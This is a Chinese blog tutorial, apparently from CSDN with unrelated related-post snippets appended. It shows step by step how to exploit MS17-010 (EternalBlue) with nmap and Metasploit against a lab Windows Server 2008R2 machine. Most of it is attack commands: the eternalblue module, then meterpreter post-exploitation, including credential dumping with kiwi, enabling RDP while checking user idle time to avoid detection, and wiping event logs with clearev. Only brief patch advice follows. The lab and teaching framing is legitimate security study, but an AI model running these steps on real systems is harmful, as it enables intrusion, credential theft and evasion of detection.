代码编织梦想

MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法


前言

提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。


0x01 准备工作

  • 靶机:Windows server 2008R2(IP:192.168.178.128)
  • 攻击机:Kali 2020(IP:192.168.178.131)
  • 工具:namap(这里主要用于漏洞扫描,也可以使用nussus等其他工具)、metasploit(msf)

0x02 漏洞利用

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.178.128

可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。
在这里插入图片描述
打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)

msfconsole

在这里插入图片描述
搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)

search ms17-010

在这里插入图片描述
加载扫描模块。(选项1)

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options

在这里插入图片描述
RHOSTS显示远程主机未配置,配置目标主机。

set rhosts 192.168.178.128

在这里插入图片描述
开始扫描漏洞,再次证实靶机存在MS17-010漏洞。

exploit

在这里插入图片描述
使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:

set payload

在这里插入图片描述
查看选项并设置rhosts:

set rhosts 192.168.178.128

在这里插入图片描述
输入exploit开始攻击。
在这里插入图片描述
运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

演示几个功能

  1. 捕获屏幕
 meterpreter > screenshot

在这里插入图片描述
在这里插入图片描述

  1. 上传/下载文件
meterpreter > upload hello.txt c://

在这里插入图片描述
在这里插入图片描述

meterpreter > download d://1.txt

在这里插入图片描述
在这里插入图片描述

  1. 远程桌面
meterpreter > run vnc 

启动失败了- -好像是靶机没有启动vnc服务。
在这里插入图片描述

  1. 获取cmd,出现了编码问题。
meterpreter > shell

在这里插入图片描述

  1. 获取用户密码
meterpreter > load kiwi 
Loading extension kiwi...Success. 

Kiwi在32位系统中能够正常使用,到了64位系统中需要用到进程迁移
进程迁移请参考:http://hackdig.com/09/hack-144260.htm

完成进程迁移后:

meterpreter > creds_all

在这里插入图片描述

  1. 启用远程桌面,配合上一步获取到的密码。
meterpreter > run post/windows/manage/enable_rdp

使用时一般配合查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。登录rdp会把对方顶掉。

meterpreter > idletime

在这里插入图片描述
使用 rdesktop 命令远程连接桌面

root@kali:~# rdesktop 192.168.2.6

在这里插入图片描述
用上一步获取的账户密码进行登录,登录成功。
在这里插入图片描述

  1. 清除日志
meterpreter > clearev

清除日志前,靶机的事件查看器是这样的。(记录了大量的事件)
在这里插入图片描述
在这里插入图片描述
被清空了~
在这里插入图片描述
还有很多功能选项,可以自己去查一下,就不全部罗列出来了。

0x03 修复方案

受影响的系统版本可以参照:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。

总结

为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/ElsonHY/article/details/109939420

双系统windows下安装deepin20-爱代码爱编程

双系统windows下安装deepin20 下载deepin.ios并制作启动盘分卷安装deepin安装完成后拔掉启动盘重启就可以愉快玩耍了 下载deepin.ios并制作启动盘 deepin官网,下载ios,这里我选择网易云镜像 http://mirrors.163.com/deepin-cd/ ,然后下载启动盘制作工具 然后按照提示将io

WIN10上搭建ESP32-IDF的编译环境详解及问题总结-爱代码爱编程

好记性不如烂笔头,既然不够聪明,就乖乖的做笔记,温故而知新。 ESP32_IDF可以搭建多种开发环境: arduino+ESP32;VS CODE_ESP32;直接在WIN10上搭建ESP32开发环境;第一种和第二种网络教程较多,我都比较容易的安装成功,第三种网络教程比较少,大多讲的含糊不清,官网文档相互嵌套句意模糊,特此总结一下,希望对你有所帮助。

win10_x64下shellcode提权工具(SYSTEM权限)-爱代码爱编程

之前写过一篇远线程注入与一篇shellcode编写的文章:Win10_X64远线程注入dll(非CreateRemoteThread)Windows 10_X64环境shellcode编写 上一次是通过远线程注入,将指定的dll模块加载进我们指定的进程,这一次将我们写好的shellcode注入进指定的进程,从而执行任意代码。 首先我们要清楚如何获取一个具有

Redis安装(windows版和Ubuntu版)-爱代码爱编程

Redis安装(windows版和Ubuntu版) Redis简介 Redis是一款开源的,高性能的key-value数据库。 windows版下载地址:https://github.com/tporadowski/redis/releases Linus版下载地址:https://redis.io/download Windows版安装步骤

100行python代码,打造自己的视频下载器-爱代码爱编程

​编者的话:     hello,小伙伴们。我是"风尘",今天又来给大家分享知识啦。为了提起大家对编程的兴趣,今天给大家带来一个用python语言编写的视频下载器。让互联网上的视频"能看就能下载" 需求分析     继上次给大家做了一个免费看视频的网站后,我又"狂躁了"。又让我想起了某些小网站上真的有很多好的视频资源,但是唯独没有下载按钮。如果我

TIBCO Jaspersoft Studio报表开发 使用教程-基础版-爱代码爱编程

开发工具 软件名称TIBCO Jaspersoft Studio界面功能使用教程1. 创建数据源2. 添加驱动3. 新建.jrxml报表设计文件报表样式设计1、首先详细了解下以下几个部分的使用:2、组件使用:3、属性部分(包括设置报表的属性、组件的属性、字体的属性等):4、报表展示的数据,来源于该部分设计5、MainReport 介绍6、预览设计结

扫描agent端主机配置(centos7)-爱代码爱编程

背景 一般机器如果做扫描agent端,其实配置方面是有很多可优化的点,此处以centos7为例,另外一般不推荐agent装在docker中运行,进行大量扫描,坑较多。 配置 关闭selinux:vi /etc/selinux/config ,第6行改成SELINUX=disabled# This file controls the state of

ZERO DAY ATTACK(持续更新目前完成25%)-爱代码爱编程

ZERO DAY ATTACK 1.现代攻击的精髓是 2.Bug和漏洞的区别是什么 3.什么是PoC 4.什么是Exp 5.什么是补丁比较漏洞分析方法 6.什么是CVE、CETR 7.Black Tuesday是什么0day、1day、5day是指 8.#pragma data_seg()的作用是什么 9.r3内存和r0内存的区别 10.什么是硬盘内存 1

bitbucket的git参数命令注入漏洞-爱代码爱编程

文章目录 环境准备利用思路 环境准备 由于bitbucket免费时间有限,搭建完后尽快服用,时间久了会导致应用过期。 1、安装docker和docker-compose 2、给docker创建一个网络,使得docker分配ip的时候可控,防止与其他东西冲突 docker network create --subnet 172.18.0.1

Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)-爱代码爱编程

声明 好好学习,天天向上 漏洞描述 Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻

Tomcat Session 反序列化(CVE-2020-9484)-爱代码爱编程

声明 好好学习,天天向上 漏洞描述 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 由于错误配置和 org.apache.catalina.session.FileStore 的 LFI 和反序列化漏洞引起的 RCE。 当配置了 org.apache.catalina.